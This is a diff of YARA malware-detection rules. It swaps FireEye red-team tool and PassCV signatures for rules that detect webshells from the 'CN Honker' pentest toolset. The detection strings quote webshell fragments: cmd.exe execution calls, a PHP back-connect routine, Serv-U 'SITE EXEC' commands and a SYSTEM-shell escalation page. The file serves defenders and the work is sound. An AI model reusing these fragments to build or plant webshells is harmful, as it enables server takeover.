-		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
-		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
-		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
-		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
-		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
-		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii
+		$s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii
 
 	condition:
-		$winblows or 3 of ( $rat* )
+		filesize < 353KB and 2 of them
 }
-rule SIGNATURE_BASE_Hacktool_MSIL_Sharpivot_3_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Su7_X_9_X : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
-		author = "FireEye"
-		id = "956ba026-c2fa-55fd-be53-0cfaa345f27a"
-		date = "2020-12-08"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1145-L1174"
+		description = "Webshell from CN Honker Pentest Toolset - file su7.x-9.x.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5d546ce8-6f8f-5b0b-9472-23f283ef9f80"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L548-L563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "f51ac9637f47a98beee1b3c37b594e292aab0e1d3f9e49c41b1f3c3ce02e17de"
-		score = 75
+		hash = "808396b51023cc8356f8049cfe279b349ca08f1a"
+		logic_hash = "2d2398cf0f9e253eea343d39b6555f2633f92f627f1c93cc28123d5a7f3d1bf1"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "SharPivot" ascii wide
-		$str2 = "ParseArgs" ascii wide
-		$str3 = "GenRandomString" ascii wide
-		$str4 = "ScheduledTaskExists" ascii wide
-		$str5 = "ServiceExists" ascii wide
-		$str6 = "lpPassword" ascii wide
-		$str7 = "execute" ascii wide
-		$str8 = "WinRM" ascii wide
-		$str9 = "SchtaskMod" ascii wide
-		$str10 = "PoisonHandler" ascii wide
-		$str11 = "SCShell" ascii wide
-		$str12 = "SchtaskMod" ascii wide
-		$str13 = "ServiceHijack" ascii wide
-		$str14 = "ServiceHijack" ascii wide
-		$str15 = "commandArg" ascii wide
-		$str16 = "payloadPath" ascii wide
-		$str17 = "Schtask" ascii wide
+		$s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii
+		$s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		filesize < 59KB and all of them
 }
-rule SIGNATURE_BASE_Hacktool_MSIL_SEATBELT_1_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cfmshell : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
-		author = "FireEye"
-		id = "cfd730ac-1eec-5e04-b871-c14912bc0425"
-		date = "2020-12-08"
-		modified = "2023-01-27"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1210-L1233"
+		description = "Webshell from CN Honker Pentest Toolset - file cfmShell.cfm"
+		author = "Florian Roth (Nextron Systems)"
+		id = "40d50ddb-2963-5d8e-b93a-bb44a8944229"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L565-L580"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "848837b83865f3854801be1f25cb9f4d"
-		logic_hash = "89275ec08b75cef371b70fb749cbcada3f30309869094ab7940811fe40f8a008"
-		score = 75
-		quality = 67
+		hash = "740796909b5d011128b6c54954788d14faea9117"
+		logic_hash = "0767012ec8fd4a18a64eca04d459efb55fafd29ed052dab8a0eb1b8f4ce7aa66"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
-		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
-		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
-		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
-		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
-		$str6 = "*[System/EventID={0}]" ascii nocase wide
-		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
-		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
-		$str10 = "{0,-23}" ascii nocase wide
+		$s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
+		$s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_APT_Builder_PY_REDFLARE_2_1
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp4 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "FireEye"
-		id = "74c56ee1-734e-5fdb-beee-6345a5993f68"
-		date = "2020-12-01"
-		modified = "2020-12-01"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1376-L1391"
+		description = "Webshell from CN Honker Pentest Toolset - file asp4.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L582-L598"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4410e95de247d7f1ab649aa640ee86fb"
-		logic_hash = "0f28fb23c0c1d589466c7c541c8dc588b038d02dded0c66c4a448d1f768c95c5"
-		score = 75
+		hash = "4005b83ced1c032dc657283341617c410bc007b8"
+		logic_hash = "ae02d1efc975a8592a00cbab823355fb778fbb589f5752dd913aa432b316c3a4"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<510sxxII"
-		$s2 = "0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,"
-		$s3 = "parsePluginOutput"
+		$s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
+		$s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii
+		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
 
 	condition:
-		all of them and #s2 == 2
+		filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_2_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_2_Admin_By_Lake2 : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
-		author = "FireEye"
-		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
-		date = "2020-12-08"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1453-L1484"
+		description = "Webshell from CN Honker Pentest Toolset - file Serv-U 2 admin by lake2.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8fce8835-a4ed-58df-a725-0c1fc04becaa"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L600-L617"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "45c83e0d39184abcbc0ccc5804ab745b4feec1fad424a543a05754e5b4cca311"
-		score = 75
-		quality = 60
+		hash = "cb8039f213e611ab2687edd23e63956c55f30578"
+		logic_hash = "a67c08b3a4bed2385d2fa8c007615bfb37a2d739cc13ee2e0f5eda00536b6ea8"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii
+		$s2 = "response.write \"FTP user lake  pass admin123 :)<br><BR>\"" fullword ascii
+		$s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii
+		$s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
+		filesize < 17KB and 2 of them
 }
-
-rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_4_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php3 : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
-		author = "FireEye"
-		id = "ae67445c-e7fd-5858-be8b-7ee84a16a031"
-		date = "2020-12-08"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L1706-L1716"
+		description = "Webshell from CN Honker Pentest Toolset - file php3.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3000ac40-35de-5d24-85fb-4d105b07c2e7"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L619-L634"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "fa76e994beb2ab1b7950cf9d6391adf4e1ba45586a14a6340fa8a25a904821e4"
-		score = 75
+		hash = "e2924cb0537f4cdfd6f1bd44caaaf68a73419b9d"
+		logic_hash = "ba3892feacbbe3d7c6b6308a22ca22b19ae84b6490df2c976852260da2a96ca1"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii
+		$s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_Hacktool_MSIL_PXELOOT_2_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_By_Goldsun : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the PXE And Loot code."
-		author = "FireEye"
-		id = "ff46a0e9-f7d2-57f2-9727-26b69ea5ba71"
-		date = "2020-12-08"
-		modified = "2023-01-27"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fireeye_redteam_tools.yar#L2088-L2113"
+		description = "Webshell from CN Honker Pentest Toolset - file Serv-U_by_Goldsun.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d8b85c33-b05d-531a-9c0a-a1dddcae0da4"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L636-L653"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d93100fe60c342e9e3b13150fd91c7d8"
-		logic_hash = "f9a9167b806e0e3df3720c13b4009e18c5a36913d255978cb001c2284533ea82"
-		score = 75
-		quality = 43
+		hash = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
+		logic_hash = "962b2e75c03f716fc039cf26aa238e9a3faf5a7ea8fb3d4da556fa601790055a"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str2 = "InvestigateRPC" ascii nocase wide
-		$str3 = "DhcpRecon" ascii nocase wide
-		$str4 = "UnMountWim" ascii nocase wide
-		$str5 = "remote WIM image" ascii nocase wide
-		$str6 = "DISMWrapper" ascii nocase wide
-		$str7 = "findTFTPServer" ascii nocase wide
-		$str8 = "DHCPRequestRecon" ascii nocase wide
-		$str9 = "DHCPDiscoverRecon" ascii nocase wide
-		$str10 = "GoodieFile" ascii nocase wide
-		$str11 = "InfoStore" ascii nocase wide
-		$str12 = "execute" ascii nocase wide
+		$s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii
+		$s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
+		$s3 = "127.0.0.1:<%=port%>," fullword ascii
+		$s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php10 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file php10.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99a26daa-c563-5b23-89b9-965d8ce7229d"
-		date = "2016-10-20"
+		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L10-L34"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L655-L670"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dfa356b4dff12c3de467c74763fc4d233db9ff5bc3e9ac9f052d331fa47a4ded"
-		score = 75
+		hash = "3698c566a0ae07234c8957112cdb34b79362b494"
+		logic_hash = "76bb2dfd518173f031cc3c93b2098edaef4aca09f0dd8228223257b0b7df452b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a"
-		hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55"
 
 	strings:
-		$x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii
-		$x2 = "bin\\oSaberSvc.pdb" ascii
-		$s1 = "cmd.exe /c MD " fullword ascii
-		$s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide
-		$s3 = "CloudRun.exe" fullword wide
-		$s4 = "SaberSvcB.exe" fullword wide
-		$s5 = "SaberSvc.exe" fullword wide
-		$s6 = "SaberSvcW.exe" fullword wide
-		$s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide
-		$s8 = "Internet Connect Failed!" fullword ascii
+		$s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii
+		$s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) and 5 of ( $s* ) ) ) or ( all of them )
+		filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_Signing_Cert : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Servu : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file servu.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b2d1313-6454-5e3f-9b58-5b1a26739ba8"
-		date = "2016-10-20"
+		id = "3e50d991-7297-5766-b68a-e74aa34ce042"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L36-L57"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L671-L686"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ead1de262858960a13b375713183f775bc275fbf4beba4c0839cef2baa5e9f00"
-		score = 50
+		hash = "7de701b86820096e486e64ca34f1fa9f2fbba641"
+		logic_hash = "d3956b6daa0649233372aea4176e0d43c44d866146884222f92b7efe01f288bb"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e"
 
 	strings:
-		$s1 = "WOODTALE TECHNOLOGY INC" ascii
-		$s2 = "Flyingbird Technology Limited" ascii
-		$s3 = "Neoact Co., Ltd." ascii
-		$s4 = "AmazGame Age Internet Technology Co., Ltd" ascii
-		$s5 = "EMG Technology Limited" ascii
-		$s6 = "Zemi Interactive Co., Ltd" ascii
-		$s7 = "337 Technology Limited" ascii
-		$s8 = "Runewaker Entertainment0" fullword ascii
+		$s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii
+		$s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
+		filesize < 41KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp2 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file jsp2.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd9eb5f6-9faa-584d-b3b5-6dcfdc3f359c"
-		date = "2016-10-20"
+		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L59-L82"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L688-L704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f640f1dc60c6714195dcdb9a0bb4fb0c34e0a62673bca00c7f49f7b73c3f9b0a"
-		score = 75
+		hash = "412ed15eb0d24298ba41731502018800ffc24bfc"
+		logic_hash = "1ec77a1b0d30cdebce1b5b07445247016230b733a594d8d1de642c2c8af63031"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4"
-		hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78"
-		hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b"
-		hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2"
 
 	strings:
-		$x1 = "ncProxyXll" fullword ascii
-		$s1 = "Uniscribe.dll" fullword ascii
-		$s2 = "WS2_32.dll" ascii
-		$s3 = "ProxyDll" fullword ascii
-		$s4 = "JDNSAPI.dll" fullword ascii
-		$s5 = "x64.dat" fullword ascii
-		$s6 = "LSpyb2" fullword ascii
+		$s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii
+		$s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii
+		$s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them )
+		filesize < 23KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_Excalibur_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx2 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx2.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eadad36c-49c8-50e1-8334-813d2e760fe9"
-		date = "2016-10-20"
+		id = "0da59fde-2214-5677-943f-05b8da4fd9d4"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L84-L105"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L706-L723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffbd971368420460573c4ecc68261088ffacf91ab9ae72405b41393b04aa2b46"
-		score = 75
+		hash = "95db7a60f4a9245ffd04c4d9724c2745da55e9fd"
+		logic_hash = "7af90992bc3f708d877dcd5841c0d132793e41a0796607907084516d955b3ae0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb"
-		hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70"
 
 	strings:
-		$x1 = "F:\\Excalibur\\Excalibur\\" ascii
-		$x2 = "Excalibur\\bin\\Shell.pdb" ascii
-		$x3 = "SaberSvc.exe" wide
-		$s1 = "BBB.exe" fullword wide
-		$s2 = "AAA.exe" fullword wide
+		$s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii
+		$s1 = "<head runat=\"server\">" fullword ascii
+		$s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii
+		$s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of ( $x* ) or all of ( $s* ) ) or 3 of them
+		uint16( 0 ) == 0x253c and filesize < 9KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Hy2006A : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file hy2006a.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03e5efc0-6076-501f-a600-b3d9008a8711"
-		date = "2016-10-20"
